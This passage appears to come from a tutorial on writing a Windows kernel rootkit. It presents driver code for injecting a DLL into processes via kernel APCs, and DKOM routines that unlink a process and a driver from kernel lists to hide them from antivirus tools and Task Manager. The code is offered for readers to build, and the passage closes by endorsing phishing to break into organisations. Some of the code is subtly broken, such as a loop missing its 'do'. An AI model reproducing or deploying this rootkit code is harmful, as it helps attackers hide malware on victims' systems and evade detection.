Before we go deeper into DLL injection, we have to understand how the driver can be unloaded properly. We accomplish this using the Unload function.

VOID Unload(IN PDRIVER_OBJECT pDriverobject)
{
    // Remove the image load notification routine
    PsRemoveLoadImageNotifyRoutine(&LoadImageNotifyRoutine);
}

Here, we use the PsRemoveLoadImageNotifyRoutine function to unregister the previously registered image load notification routine.

DLL Injection

Our exploration of kernel-mode DLL injection is incomplete without understanding how the actual injection takes place. The DllInject function is the key to achieving this.

NTSTATUS DllInject(HANDLE ProcessId, PEPROCESS Peprocess, PETHREAD Pethread, BOOLEAN Alert)
{
    HANDLE hProcess;
    OBJECT_ATTRIBUTES oa = { sizeof(OBJECT_ATTRIBUTES) };
    CLIENT_ID cidprocess = { 0 };
    CHAR DllFormatPath[] = "C:\\foo.dll";
    ULONG Size = strlen(DllFormatPath) + 1;
    PVOID pvMemory = NULL;

    cidprocess.UniqueProcess = ProcessId;
    cidprocess.UniqueThread = 0;

    // Open the target process
    if (NT_SUCCESS(ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &oa, &cidprocess)))
    {
        // Allocate virtual memory in the target process
        if (NT_SUCCESS(ZwAllocateVirtualMemory(hProcess, &pvMemory, 0, &Size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)))
        {
            KAPC_STATE KasState;
            PKAPC Apc;

            // Attach to the target process
            KeStackAttachProcess(Peprocess, &KasState);

            // Copy the DLL path to the target process's memory
            strcpy(pvMemory, DllFormatPath);

            // Detach from the target process
            KeUnstackDetachProcess(&KasState);

            // Allocate memory for the APC
            Apc = (PKAPC)ExAllocatePool(NonPagedPool, sizeof(KAPC));
            if (Apc)
            {
                // Initialize the APC with the appropriate routine and parameters
                KeInitializeApc(Apc, Pethread, 0, (PKKERNEL_ROUTINE)APCKernelRoutine, 0, (PKNORMAL_ROUTINE)Hash.pvLoadLibraryExA, UserMode, pvMemory);

                // Insert the APC into the thread's queue
                KeInsertQueueApc(Apc, 0, 0, IO_NO_INCREMENT);
                return STATUS_SUCCESS;
            }
        }
        // Close the target process handle
        ZwClose(hProcess);
    }

    return STATUS_NO_MEMORY;
}

The DllInject function serves the critical role of injecting a DLL into a target process from kernel mode. It accepts several parameters, including the ProcessId of the target process, the PEPROCESS structure of the target process (Peprocess), the PETHREAD structure of the target thread (Pethread), and a Boolean value indicating whether alertable I/O is allowed (Alert).

The injection process begins with the opening of the target process using ZwOpenProcess. This step grants us access to the target process with full privileges.

Subsequently, we allocate virtual memory within the target process using ZwAllocateVirtualMemory. This allocated memory will be used to store the path to the DLL that we intend to inject.

To safely write data into the target process’s memory, we attach to the target process using KeStackAttachProcess. This attachment is crucial for the integrity and safety of the DLL injection process.

With the attachment in place, we copy the path of the DLL to be injected into the allocated virtual memory within the target process. This path is defined in the DllFormatPath variable.

After successfully copying the DLL path, we detach from the target process using KeUnstackDetachProcess.

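The heart of the DLL injection is an Asynchronous Procedure Call (APC). We allocate a KAPC from non-paged pool using ExAllocatePool and initialize it with KeInitializeApc: APCKernelRoutine is the kernel routine, the address stored in Hash.pvLoadLibraryExA is the user-mode normal routine, and pvMemory (the DLL path we just copied) is passed as its context. KeInsertQueueApc then queues the APC on the target thread.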

To ensure that DLL injection occurs in a controlled and synchronized manner, we rely on the SirifefWorkerRoutine and APCInjectorRoutine functions.

VOID SirifefWorkerRoutine(PVOID Context)
{
    DllInject(((PSIRIFEF_INJECTION_DATA)Context)->ProcessId, ((PSIRIFEF_INJECTION_DATA)Context)->Process, ((PSIRIFEF_INJECTION_DATA)Context)->Ethread, FALSE);
    KeSetEvent(&((PSIRIFEF_INJECTION_DATA)Context)->Event, (KPRIORITY)0, FALSE);
    return;
}

The SirifefWorkerRoutine function acts as a worker routine responsible for triggering the DLL injection. It accepts a single Context parameter.

Once DllInject returns, the routine sets an event with KeSetEvent to signal that the injection attempt has finished. Note that the event is set whether or not DllInject succeeded. It lets the code that queued the work item wait for completion before continuing.

DLL Injection via APC

The injection starts in the APCInjectorRoutine function, which orchestrates the whole process. It zeroes a SIRIFEF_INJECTION_DATA structure, Sf, fills it with the current thread, process, and process ID, and queues a work item (SirifefWorkerRoutine) to perform the injection. It then waits on the event until the worker has finished.

VOID NTAPI APCInjectorRoutine(PKAPC Apc, PKNORMAL_ROUTINE *NormalRoutine, PVOID *SystemArgument1, PVOID *SystemArgument2, PVOID* Context)
{
    SIRIFEF_INJECTION_DATA Sf;

    RtlSecureZeroMemory(&Sf, sizeof(SIRIFEF_INJECTION_DATA));
    ExFreePool(Apc);

    // Initialize the SIRIFEF_INJECTION_DATA structure with the necessary information
    Sf.Ethread = KeGetCurrentThread();
    Sf.Process = IoGetCurrentProcess();
    Sf.ProcessId = PsGetCurrentProcessId();

    // Initialize an event to synchronize the DLL injection
    KeInitializeEvent(&Sf.Event, NotificationEvent, FALSE);

    // Initialize a work item to execute the SirifefWorkerRoutine
    ExInitializeWorkItem(&Sf.WorkItem, (PWORKER_THREAD_ROUTINE)SirifefWorkerRoutine, &Sf);

    // Queue the work item to be executed on the DelayedWorkQueue
    ExQueueWorkItem(&Sf.WorkItem, DelayedWorkQueue);

    // Wait for the DLL injection to complete
    KeWaitForSingleObject(&Sf.Event, Executive, KernelMode, TRUE, 0);

    return;
}

These routines work together to schedule and execute the DLL injection into the target process after the kernel32.dll module is loaded. The injection is performed in a controlled and synchronized manner, ensuring that the target process is injected with the specified DLL.

Hide Process

An interesting technique we can use in our rootkit is to hide, or unlink, a target process so that it is hidden from AVs and no longer appears in the Windows Task Manager.

To hide our process we need to understand a few Windows internals concepts, starting with the EPROCESS data structure. EPROCESS is an opaque kernel structure that contains important information about each process running on the system. The offsets of its fields change from build to build and version to version.

What we’re interested in is ActiveProcessLinks, a LIST_ENTRY embedded in EPROCESS that links each process into the list of active processes. We can’t access it directly as EPROCESS.ActiveProcessLinks, because the structure’s layout is not publicly defined. Instead, we have to use PsGetCurrentProcess to get the current EPROCESS and then add an offset that is version dependent. This is the downside of the EPROCESS structure: it makes it very hard to write a Windows kernel rootkit that is compatible across versions.

kd> dt nt!_EPROCESS
<..redacted...>
    +0x000 Pcb              : _KPROCESS
    +0x3e8 ProcessLock      : _EX_PUSH_LOCK
    +0x2f0 UniqueProcessId  : Ptr64 Void
    +0x400 ActiveProcessLinks : _LIST_ENTRY

The LIST_ENTRY data structure is a node in a doubly-linked list, where Flink (forward link) and Blink (backward link) point to the next and previous elements in the list.

Using the information above, we can hide our process by manipulating these kernel data structures. To do so, we point the Flink of the previous entry at the next entry, and the Blink of the next entry at the previous entry.

This manipulation unlinks the data structure of our target process, EPROCESS 2, from the doubly-linked list, so tools that enumerate processes by walking this list no longer see it.

// Function to hide a process by manipulating kernel data structures
NTSTATUS HideProcess(ULONG pid) {
    PEPROCESS currentEProcess = PsGetCurrentProcess();
    LIST_ENTRY* currentList = &currentEProcess->ActiveProcessLinks;
    
    // Get the offsets for UniqueProcessId and ActiveProcessLinks
    ULONG uniqueProcessIdOffset = FIELD_OFFSET(EPROCESS, UniqueProcessId);
    ULONG activeProcessLinksOffset = FIELD_OFFSET(EPROCESS, ActiveProcessLinks);
    
    ULONG currentPid;
    {
        // Check if the current process ID is the one to hide
        RtlCopyMemory(&currentPid, (PUCHAR)currentEProcess + uniqueProcessIdOffset, sizeof(currentPid));
        if (currentPid == pid) {
            // Remove the process from the list
            LIST_ENTRY* blink = currentList->Blink;
            LIST_ENTRY* flink = currentList->Flink;
            blink->Flink = flink;
            flink->Blink = blink;
            return STATUS_SUCCESS;
        }
        
        // Move to the next process
        currentList = currentList->Flink;
        currentEProcess = CONTAINING_RECORD(currentList, EPROCESS, ActiveProcessLinks);
    } while (currentList != &currentEProcess->ActiveProcessLinks);
    
    return STATUS_NOT_FOUND;  // Process not found
}

The HideProcess function hides a process using the DKOM (Direct Kernel Object Manipulation) technique. It takes the Process ID (PID) of the target process as an argument. Here’s how it works:

  1. It starts by obtaining the EPROCESS structure of the process the driver code is currently running in, using PsGetCurrentProcess.
  2. The code then retrieves the offsets within the EPROCESS structure for UniqueProcessId and ActiveProcessLinks.
  3. It iterates through the list of active processes, comparing the PID of each process with the target PID. When it finds a match, it unlinks the process from the ActiveProcessLinks list, effectively hiding it.
  4. The function returns STATUS_SUCCESS if it successfully hides the process. If the target process is not found, it returns STATUS_NOT_FOUND.

Hiding a Driver

In addition to hiding processes, we can also employ the DKOM technique to hide drivers from the system. This is particularly useful in scenarios where a rootkit needs to remain undetected.

// Function to hide a driver by manipulating data structures
NTSTATUS HideDriver(PDRIVER_OBJECT driverObject) {
    KIRQL irql;
    
    // Raise IRQL to DPC level
    irql = KeRaiseIrqlToDpcLevel();
    
    // Get the module entry from the DriverObject
    PLDR_DATA_TABLE_ENTRY moduleEntry = (PLDR_DATA_TABLE_ENTRY)driverObject->DriverSection;
    
    // Unlink the module entry
    moduleEntry->InLoadOrderLinks.Blink->Flink = moduleEntry->InLoadOrderLinks.Flink;
    moduleEntry->InLoadOrderLinks.Flink->Blink = moduleEntry->InLoadOrderLinks.Blink;
    
    // Lower IRQL back to its original value
    KeLowerIrql(irql);
    
    return STATUS_SUCCESS;
}

The HideDriver function is designed to hide a driver by manipulating kernel data structures. Here’s a breakdown of how it works:

  1. It raises the IRQL (Interrupt Request Level) to DISPATCH_LEVEL, the level at which DPCs (Deferred Procedure Calls) run, using KeRaiseIrqlToDpcLevel. This keeps the current thread from being preempted while the list is modified. Note that it only affects the current processor, so on a multiprocessor system it does not by itself make the change atomic.
  2. Next, it obtains the module entry by casting the DriverSection member of the provided driverObject to a PLDR_DATA_TABLE_ENTRY. This provides access to information about the driver module.
  3. It unlinks the module entry from the kernel’s internal linked lists. By manipulating the InLoadOrderLinks member of the module entry, it effectively removes the driver from the list of loaded modules.
  4. Finally, it lowers the IRQL back to its original value using KeLowerIrql, allowing normal system operation to resume.

That’s it for now; I’ll stop here. If you’re still feeling a bit lost, don’t worry: rootkit development can be pretty advanced. I suggest you keep learning and doing some research as you read. Don’t be afraid of the tricky parts! Explore different resources, try out some code, and remember that getting good at this takes time and practice.

And remember:

“Social engineering and phishing, combined with some operative knowledge about windows hacking, should be enough to get you inside the networks of most organization”

Source and Credits